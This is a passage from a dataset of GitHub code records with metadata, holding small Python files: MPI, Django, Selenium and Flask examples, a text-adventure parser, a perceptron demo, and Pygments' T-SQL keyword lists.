f'lata pracy: {self.latapracy}, wynagrodzenie: {self.wynagrodzenie} zł')\n \n \n \n","repo_name":"albim72/PYTHON_Z12","sub_path":"DZIEN_2/OSOBY_/pracownik.py","file_name":"pracownik.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21636475198","text":"from mpi import MPI\nfrom mpi import constants\n\nmpi = MPI()\nworld = mpi.MPI_COMM_WORLD\n\nrank = world.rank()\nsize = world.size()\n\nhandles = []\n\nfor i in range(100):\n if rank == 0:\n # This rank receives every message received by the other \n # processes. \n for j in range(size-1):\n handle = world.irecv(constants.MPI_SOURCE_ANY) \n handles.append(handle)\n\n while handles:\n request_list = world.testsome(handles)\n if request_list:\n # Finish the request\n world.waitall(request_list)\n handles = [ r for r in handles if r not in request_list]\n\n else:\n world.send(0, \"My data\", constants.MPI_TAG_ANY)\n\nmpi.finalize()\n","repo_name":"jamitzky/pupyMPI","sub_path":"pupympi/examples/testsome.py","file_name":"testsome.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27215484018","text":"\"\"\"login_proj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.default_books_view, name='books_main'),\n path('', views.book_by_id, name='books_by_id'),\n path('get_books', views.get_books, name='get_books'),\n path('add_book', views.add_book, name='add_book'),\n path('toggle_favorite', views.toggle_favorite, name='toggle_favorite'),\n]\n","repo_name":"twtseng/Dojo_Assignments","sub_path":"Python/django/django_full_stack/favorite_books_proj/favorite_books_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41034213078","text":"#_*_coding=utf-8_*_\n\nclass ParserError(Exception):\n\tpass\n\nclass Sentence(object):\n\t\n\tdef __init__(self, subject, verb, object):\n\t\t# remember we take ('noun', 'princess') tuples and convert them\n\t\tself.subject = subject[1]\n\t\tself.verb = verb[1]\n\t\tself.object = object[1]\n\n# 用 peek函数识别下一个单词类型\ndef peek(word_list): # 例子:word_list = [('verb', 'open'), ('stop','the'), ('noun', 'door')]\n\tif word_list: #\n\t\tword = word_list[0] # word = ('verb', 'open')\n\t\treturn word[0] # word[0] = 'verb'\n\telse:\n\t\treturn \"错误1\"\n\n# 用 match函数匹配单词\ndef match(word_list, expecting): # match(word_list, 'verb')\n\tif word_list:\n\t\tword = word_list.pop(0) # 删除 word_list 中 ('verb', 'open'), 将其传递给 word\n\n\t\tif word[0] == expecting: # word[0] = 'verb'\n\t\t\treturn word # 返回('verb', 'open')\n\t\telse:\n\t\t\treturn \"错误2\"\n\t\t\n\telse:\n\t\treturn \"错误3\"\n\n# 用 skip函数筛选符合单词类型的单词,对其执行 match函数\ndef skip(word_list, word_type):\n\twhile peek(word_list) == word_type: # peek(word_list)返回'verb'\n\t\tmatch(word_list, word_type) # match 返回 ('verb', 'open')\n\n\n# 用 parse_verb取出 verb类型的元组\ndef parse_verb(word_list):\n skip(word_list, 'stop') # 用 skip函数筛选 stop类型的单词\n \n if peek(word_list) == 'verb': # 如果下一个单词是 verb类型的单词,则匹配\n return match(word_list, 'verb') # verb,并返回值\n else:\n raise ParserError(\"Expected a verb next.\")\n\n# 用 parse_object函数筛选目标单词(名词和方向词)\ndef parse_object(word_list):\n\tskip(word_list, 'stop') # 在单词列表(word_list)中筛选修饰词(stop)\n\tnext = peek(word_list) # 取出单词列表(word_list)中的第一个单词\n\t\n\tif next == 'noun': \n\t\treturn match(word_list, 'noun') # 匹配名词\n\tif next == 'direction':\n\t\treturn match(word_list, 'direction') # 匹配方向词\n\telse:\n\t\traise ParserError(\"Expected a noun or direction next.\")\n\n# 用 parse_subject函数得到三个值:subj由 parse_sentence 待定、动词、名词或方向词待定、动词、名词或方向词\ndef parse_subject(word_list, subj):\n\tverb = parse_verb(word_list) # 动词\n\tobj = parse_object(word_list) # 名词或方向词\n\t\n\treturn Sentence(subj, verb, obj) #\n\n# 用 parse_sentence函数获得三个值:\ndef parse_sentence(word_list):\n\tskip(word_list, 'stop') # 跳过动词\n\t\n\tstart = peek(word_list) # 获得名词或动词\n\t\n\tif start == 'noun': # 如果是名词\n\t\tsubj = match(word_list, 'noun') # 获得名词的值给subj\n\t\treturn parse_subject(word_list, subj) # 调用 parse_subject 得到三个值\n\telif start == 'verb': # 如果是动词\n\t\t# assume the subject is the player then (假设主题是玩家)\n\t\treturn parse_subject(word_list, ('noun', 'player'))\n\telse:\n\t\traise ParserError(\"Must start with subject, object, or verb not: %s\" %\nstart)\n","repo_name":"PzoHua/learnpython2","sub_path":"ex49/skeleton/ex49/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1027072477","text":"def main():\n cars = ['Honda', 'Toyota', 'Nissan']\n \n # for loops are used to iterate over sequences\n \n # this loop will run 3 times printing one of the strings from the cars list each time\n for x in cars:\n print(x)\n \n # this loop will run 5 times printing each letter of the word Honda each time\n for x in cars[0]:\n print(x)\n\n # this loop will run 13 times printing the number one, incrementing x by two then printing\n # again until reaching 26 which will not be printed\n for x in range(1, 26, 2):\n print(x)\n else:\n print('That is all of the odd numbers 1 - 25')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wyatthoffman4392/recruiters-who-code-python","sub_path":"loops/for-loop.py","file_name":"for-loop.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8397578421","text":"OPERATORS = (\n '!<',\n '!=',\n '!>',\n '<',\n '<=',\n '<>',\n '=',\n '>',\n '>=',\n '+',\n '+=',\n '-',\n '-=',\n '*',\n '*=',\n '/',\n '/=',\n '%',\n '%=',\n '&',\n '&=',\n '|',\n '|=',\n '^',\n '^=',\n '~',\n '::',\n)\n\nOPERATOR_WORDS = (\n 'all',\n 'and',\n 'any',\n 'between',\n 'except',\n 'exists',\n 'in',\n 'intersect',\n 'like',\n 'not',\n 'or',\n 'some',\n 'union',\n)\n\n_KEYWORDS_SERVER = (\n 'add',\n 'all',\n 'alter',\n 'and',\n 'any',\n 'as',\n 'asc',\n 'authorization',\n 'backup',\n 'begin',\n 'between',\n 'break',\n 'browse',\n 'bulk',\n 'by',\n 'cascade',\n 'case',\n 'catch',\n 'check',\n 'checkpoint',\n 'close',\n 'clustered',\n 'coalesce',\n 'collate',\n 'column',\n 'commit',\n 'compute',\n 'constraint',\n 'contains',\n 'containstable',\n 'continue',\n 'convert',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'database',\n 'dbcc',\n 'deallocate',\n 'declare',\n 'default',\n 'delete',\n 'deny',\n 'desc',\n 'disk',\n 'distinct',\n 'distributed',\n 'double',\n 'drop',\n 'dump',\n 'else',\n 'end',\n 'errlvl',\n 'escape',\n 'except',\n 'exec',\n 'execute',\n 'exists',\n 'exit',\n 'external',\n 'fetch',\n 'file',\n 'fillfactor',\n 'for',\n 'foreign',\n 'freetext',\n 'freetexttable',\n 'from',\n 'full',\n 'function',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'holdlock',\n 'identity',\n 'identity_insert',\n 'identitycol',\n 'if',\n 'in',\n 'index',\n 'inner',\n 'insert',\n 'intersect',\n 'into',\n 'is',\n 'join',\n 'key',\n 'kill',\n 'left',\n 'like',\n 'lineno',\n 'load',\n 'merge',\n 'national',\n 'nocheck',\n 'nonclustered',\n 'not',\n 'null',\n 'nullif',\n 'of',\n 'off',\n 'offsets',\n 'on',\n 'open',\n 'opendatasource',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'over',\n 'percent',\n 'pivot',\n 'plan',\n 'precision',\n 'primary',\n 'print',\n 'proc',\n 'procedure',\n 'public',\n 'raiserror',\n 'read',\n 'readtext',\n 'reconfigure',\n 'references',\n 'replication',\n 'restore',\n 'restrict',\n 'return',\n 'revert',\n 'revoke',\n 'right',\n 'rollback',\n 'rowcount',\n 'rowguidcol',\n 'rule',\n 'save',\n 'schema',\n 'securityaudit',\n 'select',\n 'semantickeyphrasetable',\n 'semanticsimilaritydetailstable',\n 'semanticsimilaritytable',\n 'session_user',\n 'set',\n 'setuser',\n 'shutdown',\n 'some',\n 'statistics',\n 'system_user',\n 'table',\n 'tablesample',\n 'textsize',\n 'then',\n 'throw',\n 'to',\n 'top',\n 'tran',\n 'transaction',\n 'trigger',\n 'truncate',\n 'try',\n 'try_convert',\n 'tsequal',\n 'union',\n 'unique',\n 'unpivot',\n 'update',\n 'updatetext',\n 'use',\n 'user',\n 'values',\n 'varying',\n 'view',\n 'waitfor',\n 'when',\n 'where',\n 'while',\n 'with',\n 'within',\n 'writetext',\n)\n\n_KEYWORDS_FUTURE = (\n 'absolute',\n 'action',\n 'admin',\n 'after',\n 'aggregate',\n 'alias',\n 'allocate',\n 'are',\n 'array',\n 'asensitive',\n 'assertion',\n 'asymmetric',\n 'at',\n 'atomic',\n 'before',\n 'binary',\n 'bit',\n 'blob',\n 'boolean',\n 'both',\n 'breadth',\n 'call',\n 'called',\n 'cardinality',\n 'cascaded',\n 'cast',\n 'catalog',\n 'char',\n 'character',\n 'class',\n 'clob',\n 'collation',\n 'collect',\n 'completion',\n 'condition',\n 'connect',\n 'connection',\n 'constraints',\n 'constructor',\n 'corr',\n 'corresponding',\n 'covar_pop',\n 'covar_samp',\n 'cube',\n 'cume_dist',\n 'current_catalog',\n 'current_default_transform_group',\n 'current_path',\n 'current_role',\n 'current_schema',\n 'current_transform_group_for_type',\n 'cycle',\n 'data',\n 'date',\n 'day',\n 'dec',\n 'decimal',\n 'deferrable',\n 'deferred',\n 'depth',\n 'deref',\n 'describe',\n 'descriptor',\n 'destroy',\n 'destructor',\n 'deterministic',\n 'diagnostics',\n 'dictionary',\n 'disconnect',\n 'domain',\n 'dynamic',\n 'each',\n 'element',\n 'end-exec',\n 'equals',\n 'every',\n 'exception',\n 'false',\n 'filter',\n 'first',\n 'float',\n 'found',\n 'free',\n 'fulltexttable',\n 'fusion',\n 'general',\n 'get',\n 'global',\n 'go',\n 'grouping',\n 'hold',\n 'host',\n 'hour',\n 'ignore',\n 'immediate',\n 'indicator',\n 'initialize',\n 'initially',\n 'inout',\n 'input',\n 'int',\n 'integer',\n 'intersection',\n 'interval',\n 'isolation',\n 'iterate',\n 'language',\n 'large',\n 'last',\n 'lateral',\n 'leading',\n 'less',\n 'level',\n 'like_regex',\n 'limit',\n 'ln',\n 'local',\n 'localtime',\n 'localtimestamp',\n 'locator',\n 'map',\n 'match',\n 'member',\n 'method',\n 'minute',\n 'mod',\n 'modifies',\n 'modify',\n 'module',\n 'month',\n 'multiset',\n 'names',\n 'natural',\n 'nchar',\n 'nclob',\n 'new',\n 'next',\n 'no',\n 'none',\n 'normalize',\n 'numeric',\n 'object',\n 'occurrences_regex',\n 'old',\n 'only',\n 'operation',\n 'ordinality',\n 'out',\n 'output',\n 'overlay',\n 'pad',\n 'parameter',\n 'parameters',\n 'partial',\n 'partition',\n 'path',\n 'percent_rank',\n 'percentile_cont',\n 'percentile_disc',\n 'position_regex',\n 'postfix',\n 'prefix',\n 'preorder',\n 'prepare',\n 'preserve',\n 'prior',\n 'privileges',\n 'range',\n 'reads',\n 'real',\n 'recursive',\n 'ref',\n 'referencing',\n 'regr_avgx',\n 'regr_avgy',\n 'regr_count',\n 'regr_intercept',\n 'regr_r2',\n 'regr_slope',\n 'regr_sxx',\n 'regr_sxy',\n 'regr_syy',\n 'relative',\n 'release',\n 'result',\n 'returns',\n 'role',\n 'rollup',\n 'routine',\n 'row',\n 'rows',\n 'savepoint',\n 'scope',\n 'scroll',\n 'search',\n 'second',\n 'section',\n 'sensitive',\n 'sequence',\n 'session',\n 'sets',\n 'similar',\n 'size',\n 'smallint',\n 'space',\n 'specific',\n 'specifictype',\n 'sql',\n 'sqlexception',\n 'sqlstate',\n 'sqlwarning',\n 'start',\n 'state',\n 'statement',\n 'static',\n 'stddev_pop',\n 'stddev_samp',\n 'structure',\n 'submultiset',\n 'substring_regex',\n 'symmetric',\n 'system',\n 'temporary',\n 'terminate',\n 'than',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'trailing',\n 'translate_regex',\n 'translation',\n 'treat',\n 'true',\n 'uescape',\n 'under',\n 'unknown',\n 'unnest',\n 'usage',\n 'using',\n 'value',\n 'var_pop',\n 'var_samp',\n 'varchar',\n 'variable',\n 'whenever',\n 'width_bucket',\n 'window',\n 'within',\n 'without',\n 'work',\n 'write',\n 'xmlagg',\n 'xmlattributes',\n 'xmlbinary',\n 'xmlcast',\n 'xmlcomment',\n 'xmlconcat',\n 'xmldocument',\n 'xmlelement',\n 'xmlexists',\n 'xmlforest',\n 'xmliterate',\n 'xmlnamespaces',\n 'xmlparse',\n 'xmlpi',\n 'xmlquery',\n 'xmlserialize',\n 'xmltable',\n 'xmltext',\n 'xmlvalidate',\n 'year',\n 'zone',\n)\n\n_KEYWORDS_ODBC = (\n 'absolute',\n 'action',\n 'ada',\n 'add',\n 'all',\n 'allocate',\n 'alter',\n 'and',\n 'any',\n 'are',\n 'as',\n 'asc',\n 'assertion',\n 'at',\n 'authorization',\n 'avg',\n 'begin',\n 'between',\n 'bit',\n 'bit_length',\n 'both',\n 'by',\n 'cascade',\n 'cascaded',\n 'case',\n 'cast',\n 'catalog',\n 'char',\n 'char_length',\n 'character',\n 'character_length',\n 'check',\n 'close',\n 'coalesce',\n 'collate',\n 'collation',\n 'column',\n 'commit',\n 'connect',\n 'connection',\n 'constraint',\n 'constraints',\n 'continue',\n 'convert',\n 'corresponding',\n 'count',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'date',\n 'day',\n 'deallocate',\n 'dec',\n 'decimal',\n 'declare',\n 'default',\n 'deferrable',\n 'deferred',\n 'delete',\n 'desc',\n 'describe',\n 'descriptor',\n 'diagnostics',\n 'disconnect',\n 'distinct',\n 'domain',\n 'double',\n 'drop',\n 'else',\n 'end',\n 'end-exec',\n 'escape',\n 'except',\n 'exception',\n 'exec',\n 'execute',\n 'exists',\n 'external',\n 'extract',\n 'false',\n 'fetch',\n 'first',\n 'float',\n 'for',\n 'foreign',\n 'fortran',\n 'found',\n 'from',\n 'full',\n 'get',\n 'global',\n 'go',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'hour',\n 'identity',\n 'immediate',\n 'in',\n 'include',\n 'index',\n 'indicator',\n 'initially',\n 'inner',\n 'input',\n 'insensitive',\n 'insert',\n 'int',\n 'integer',\n 'intersect',\n 'interval',\n 'into',\n 'is',\n 'isolation',\n 'join',\n 'key',\n 'language',\n 'last',\n 'leading',\n 'left',\n 'level',\n 'like',\n 'local',\n 'lower',\n 'match',\n 'max',\n 'min',\n 'minute',\n 'module',\n 'month',\n 'names',\n 'national',\n 'natural',\n 'nchar',\n 'next',\n 'no',\n 'none',\n 'not',\n 'null',\n 'nullif',\n 'numeric',\n 'octet_length',\n 'of',\n 'on',\n 'only',\n 'open',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'output',\n 'overlaps',\n 'pad',\n 'partial',\n 'pascal',\n 'position',\n 'precision',\n 'prepare',\n 'preserve',\n 'primary',\n 'prior',\n 'privileges',\n 'procedure',\n 'public',\n 'read',\n 'real',\n 'references',\n 'relative',\n 'restrict',\n 'revoke',\n 'right',\n 'rollback',\n 'rows',\n 'schema',\n 'scroll',\n 'second',\n 'section',\n 'select',\n 'session',\n 'session_user',\n 'set',\n 'size',\n 'smallint',\n 'some',\n 'space',\n 'sql',\n 'sqlca',\n 'sqlcode',\n 'sqlerror',\n 'sqlstate',\n 'sqlwarning',\n 'substring',\n 'sum',\n 'system_user',\n 'table',\n 'temporary',\n 'then',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'to',\n 'trailing',\n 'transaction',\n 'translate',\n 'translation',\n 'trim',\n 'true',\n 'union',\n 'unique',\n 'unknown',\n 'update',\n 'upper',\n 'usage',\n 'user',\n 'using',\n 'value',\n 'values',\n 'varchar',\n 'varying',\n 'view',\n 'when',\n 'whenever',\n 'where',\n 'with',\n 'work',\n 'write',\n 'year',\n 'zone',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms189822.aspx.\nKEYWORDS = sorted(set(_KEYWORDS_FUTURE + _KEYWORDS_ODBC + _KEYWORDS_SERVER))\n\n# See https://msdn.microsoft.com/en-us/library/ms187752.aspx.\nTYPES = (\n 'bigint',\n 'binary',\n 'bit',\n 'char',\n 'cursor',\n 'date',\n 'datetime',\n 'datetime2',\n 'datetimeoffset',\n 'decimal',\n 'float',\n 'hierarchyid',\n 'image',\n 'int',\n 'money',\n 'nchar',\n 'ntext',\n 'numeric',\n 'nvarchar',\n 'real',\n 'smalldatetime',\n 'smallint',\n 'smallmoney',\n 'sql_variant',\n 'table',\n 'text',\n 'time',\n 'timestamp',\n 'tinyint',\n 'uniqueidentifier',\n 'varbinary',\n 'varchar',\n 'xml',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms174318.aspx.\nFUNCTIONS = (\n '$partition',\n 'abs',\n 'acos',\n 'app_name',\n 'applock_mode',\n 'applock_test',\n 'ascii',\n 'asin',\n 'assemblyproperty',\n 'atan',\n 'atn2',\n 'avg',\n 'binary_checksum',\n 'cast',\n 'ceiling',\n 'certencoded',\n 'certprivatekey',\n 'char',\n 'charindex',\n 'checksum',\n 'checksum_agg',\n 'choose',\n 'col_length',\n 'col_name',\n 'columnproperty',\n 'compress',\n 'concat',\n 'connectionproperty',\n 'context_info',\n 'convert',\n 'cos',\n 'cot',\n 'count',\n 'count_big',\n 'current_request_id',\n 'current_timestamp',\n 'current_transaction_id',\n 'current_user',\n 'cursor_status',\n 'database_principal_id',\n 'databasepropertyex',\n 'dateadd',\n 'datediff',\n 'datediff_big',\n 'datefromparts',\n 'datename',\n 'datepart',\n 'datetime2fromparts',\n 'datetimefromparts',\n 'datetimeoffsetfromparts',\n 'day',\n 'db_id',\n 'db_name',\n 'decompress',\n 'degrees',\n 'dense_rank',\n 'difference',\n 'eomonth',\n 'error_line',\n 'error_message',\n 'error_number',\n 'error_procedure',\n 'error_severity',\n 'error_state',\n 'exp',\n 'file_id',\n 'file_idex',\n 'file_name',\n 'filegroup_id',\n 'filegroup_name',\n 'filegroupproperty',\n 'fileproperty',\n 'floor',\n 'format',\n 'formatmessage',\n 'fulltextcatalogproperty',\n 'fulltextserviceproperty',\n 'get_filestream_transaction_context',\n 'getansinull',\n 'getdate',\n 'getutcdate',\n 'grouping',\n 'grouping_id',\n 'has_perms_by_name',\n 'host_id',\n 'host_name',\n 'iif',\n 'index_col',\n 'indexkey_property',\n 'indexproperty',\n 'is_member',\n 'is_rolemember',\n 'is_srvrolemember',\n 'isdate',\n 'isjson',\n 'isnull',\n 'isnumeric',\n 'json_modify',\n 'json_query',\n 'json_value',\n 'left',\n 'len',\n 'log',\n 'log10',\n 'lower',\n 'ltrim',\n 'max',\n 'min',\n 'min_active_rowversion',\n 'month',\n 'nchar',\n 'newid',\n 'newsequentialid',\n 'ntile',\n 'object_definition',\n 'object_id',\n 'object_name',\n 'object_schema_name',\n 'objectproperty',\n 'objectpropertyex',\n 'opendatasource',\n 'openjson',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'original_db_name',\n 'original_login',\n 'parse',\n 'parsename',\n 'patindex',\n 'permissions',\n 'pi',\n 'power',\n 'pwdcompare',\n 'pwdencrypt',\n 'quotename',\n 'radians',\n 'rand',\n 'rank',\n 'replace',\n 'replicate',\n 'reverse',\n 'right',\n 'round',\n 'row_number',\n 'rowcount_big',\n 'rtrim',\n 'schema_id',\n 'schema_name',\n 'scope_identity',\n 'serverproperty',\n 'session_context',\n 'session_user',\n 'sign',\n 'sin',\n 'smalldatetimefromparts',\n 'soundex',\n 'sp_helplanguage',\n 'space',\n 'sqrt',\n 'square',\n 'stats_date',\n 'stdev',\n 'stdevp',\n 'str',\n 'string_escape',\n 'string_split',\n 'stuff',\n 'substring',\n 'sum',\n 'suser_id',\n 'suser_name',\n 'suser_sid',\n 'suser_sname',\n 'switchoffset',\n 'sysdatetime',\n 'sysdatetimeoffset',\n 'system_user',\n 'sysutcdatetime',\n 'tan',\n 'textptr',\n 'textvalid',\n 'timefromparts',\n 'todatetimeoffset',\n 'try_cast',\n 'try_convert',\n 'try_parse',\n 'type_id',\n 'type_name',\n 'typeproperty',\n 'unicode',\n 'upper',\n 'user_id',\n 'user_name',\n 'var',\n 'varp',\n 'xact_state',\n 'year',\n)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/_tsql_builtins.py","file_name":"_tsql_builtins.py","file_ext":"py","file_size_in_byte":15129,"program_lang":"python","lang":"hi","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"8803604168","text":"from selenium.webdriver.remote.webdriver import WebDriver\nfrom lib.factory.factory_driver import get_driver\nfrom lib.config import config\nfrom lib.pom.qaminds.home_page import HomePage\n\n\nclass TestSearch:\n\n def setup_method(self):\n self.driver: WebDriver = get_driver()\n self.driver.get(config.get_url())\n\n def search(self):\n #busqueda de componenten samsung\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('Samsung')\n\n #busqueda de producto Canon\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('Canon')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('mac')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('ipod')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('palm')\n\n home_page = HomePage(self.driver)\n assert home_page.select_product(\"Palm Treo Pro\"), \"Product should be visible\"\n home_page._click()\n\n \"\"\"for search in [\"Canon\", \"samsung\", \"iMac\", \"ipod\", \"palm\"]:\n self.home_page.search(search)\"\"\"\n\n def teardown_method(self):\n if self.driver:\n self.driver.quit() ","repo_name":"FGabyMartinez/python-selenium-2022","sub_path":"test_Opencart/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38806890393","text":"from account.models import AccountCookie\nfrom baiduwp_python.settings.settings import logger\nfrom baiduwp_python.utils.date_utils import get_datetime_now_str\n\n\ndef get_account_cookie(username, vip_type, is_valid, order_by='-update_time'):\n match_dict = {\"is_active\": True}\n if username:\n match_dict.update({\"username__contains\": username})\n if vip_type:\n match_dict.update({\"vip_type\": vip_type})\n if is_valid:\n match_dict.update({\"is_valid\": is_valid})\n try:\n account_cookie_list = list(AccountCookie.objects.filter(**match_dict).order_by(order_by).values().all())\n return True, account_cookie_list\n except Exception as e:\n logger.error(f\"get_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n\n\ndef add_account_cookie(baidu_name, net_disk_name, uk, vip_type, bdclnd, cookie):\n try:\n count = AccountCookie.objects.filter(uk=uk, is_active=True).count()\n if count:\n return False, \"请勿重复添加\"\n date_time_now = get_datetime_now_str()\n AccountCookie.objects.create(\n baidu_name=baidu_name, net_disk_name=net_disk_name, uk=uk, vip_type=vip_type, is_valid=True, bdclnd=bdclnd,\n cookie=cookie, create_time=date_time_now, update_time=date_time_now,\n is_active=True\n )\n return True, \"新增成功\"\n except Exception as e:\n logger.error(f\"add_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n\n\ndef del_account_cookie(ids: list):\n try:\n count = AccountCookie.objects.filter(is_active=True, id__in=ids).update(is_active=False)\n return True, count\n except Exception as e:\n logger.error(f\"del_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n","repo_name":"panmeibing/baiduwp_python","sub_path":"baiduwp_python/baiduwp_python/apps/account/utils/account_orm.py","file_name":"account_orm.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26595667739","text":"#################################\n# ---- Made By Skult78911 ---- ## \n# ---- All RIght Reserved ---- ##\n# ---- Writted In VS Code ---- ## \n# ---- Writted In Python3 ---- ## \n#################################\n\nimport numpy as np # Importing Numpy Libary\nimport matplotlib.pyplot as plt # # Importing Matplotlib Libary\n\nN = 5 # Number of Looks for 1st and 2nd Classes\nb = 3 # Offset Variable b\n\n# -- Modeling 1 Image -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 + [np.random.randint(10)/10 for i in range(N)] + b # x2 Modeled as x1 And Plus Random Deviation And at the end we add the variable b\nC1 = [x1, x2] # Forming a Double List C1 From the Set of These Points (These Points x1 And x2)\n\n# -- Modeling 1 Image -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 - [np.random.randint(10)/10 for i in range(N)] - 0.1 + b # x2 Modeled as x1 And Minus Random Deviation And at the end we add the variable b\n # And Additionally We Make Minus 0.1 So That This Point x2 Is Below Our Line\n\nC2 = [x1, x2] # Forming a Double List C2 From the Set of These Points (These Points x1 And x2)\n\nf = [0+b, 1+b] # We form a straight line under 45 degrees to see how the dividing line goes But Also Adding b Variable\n\n# -- Determine 2 Coefficients -- #\nw2 = 0.5 # Let Omega 2 Coefficient Be 0.5\nw3 = -b*w2 # After that We Automatically Calculate Omega 3 Equals Minus b to Omega 2\n\nw = np.array([-w2, w2, w3]) # Well, All Weight Coefficients Will Be What's Inside (It's -w2, w2 and w3 )\nfor i in range(N):\n x = np.array([C1[0][i], C1[1][i], 1]) # Passing All Images Through Class C1\n y = np.dot(w, x) # Calculate This Output Value y\n if y >= 0: # We look If the value of y is greater than or equal to zero, then this is class C1\n print(\"Класс C1\") # And output it to the console\n else: # Otherwise It's Class C2 \n print(\"Кла��с C2\") # And output it to the console\n\nplt.scatter(C1[0][:], C1[1][:], s=10, c='red') # Display All Points C1\nplt.scatter(C2[0][:], C2[1][:], s=10, c='blue') # Display All Points C2\nplt.plot(f) # Splitting the Program With the plot Function\nplt.grid(True) # Gridding The Box Where All Neurons\nplt.show() # Showing Window With All Neurons (Like Windows Application)","repo_name":"Skult78911/CMNN-Libary","sub_path":"Source/NN XOR/Neural Network Perseptron - Classification, XOR Task - 2.py","file_name":"Neural Network Perseptron - Classification, XOR Task - 2.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10176798063","text":"from flask import Flask, render_template, request, jsonify\nimport pandas as pd\nfrom joblib import load\n\napp = Flask(__name__, template_folder=\"templates\")\n\n# Modell laden\nrf = load(\"../Models/random_forest_model.joblib\")\n\n# Laden der Daten\ndf = pd.read_csv(\"../data/life_expectancy_cleaned.csv\")\n\n# Eindeutige Ländernamen extrahieren und in eine Liste konvertieren\ncountry_list = df[\"Country\"].unique().tolist()\n\n\ndef predict_life_expectancy(input_data):\n # Konvertiere das Eingabedaten-Dict in einen DataFrame\n df = pd.DataFrame(input_data, index=[0])\n # Anwenden des One-Hot-Encodings auf die Eingabedaten\n df_encoded = pd.get_dummies(df)\n\n # Liste der Features laden\n all_features = load(\"../Models/feature_list.joblib\")\n\n # Füge fehlende Spalten hinzu und fülle sie mit Nullen\n for col in all_features:\n if col not in df_encoded.columns:\n df_encoded[col] = 0\n\n # Sortiere die Spalten, um sicherzustellen, dass sie in der gleichen Reihenfolge wie in den Trainingsdaten sind\n df_encoded = df_encoded[all_features]\n\n # Entferne die Zielvariable aus den Eingabevariablen\n df_encoded = df_encoded.drop(columns=[\"Life expectancy\"])\n\n # Vorhersage durchführen\n prediction = rf.predict(df_encoded)\n prediction = prediction * 100 # Zurückkonvertieren in Jahre\n\n return prediction\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\", country_list=country_list)\n\n\ndef convert_to_float(val):\n try:\n return float(val)\n except ValueError:\n return val\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Extrahiere die Daten aus der Anfrage\n data = request.form.to_dict()\n data = {k: [convert_to_float(v)] for k, v in data.items()}\n\n # Vorhersage durchführen\n prediction = predict_life_expectancy(data)\n\n # Verwandle die Vorhersage in JSON und gib sie zurück\n return jsonify({\"prediction\": prediction.tolist()})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"peledin/LifeExpectancy","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1031806878","text":"from sklearn.svm import SVC\r\nfrom matplotlib.colors import ListedColormap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nnp.random.seed(1)\r\nxXor = 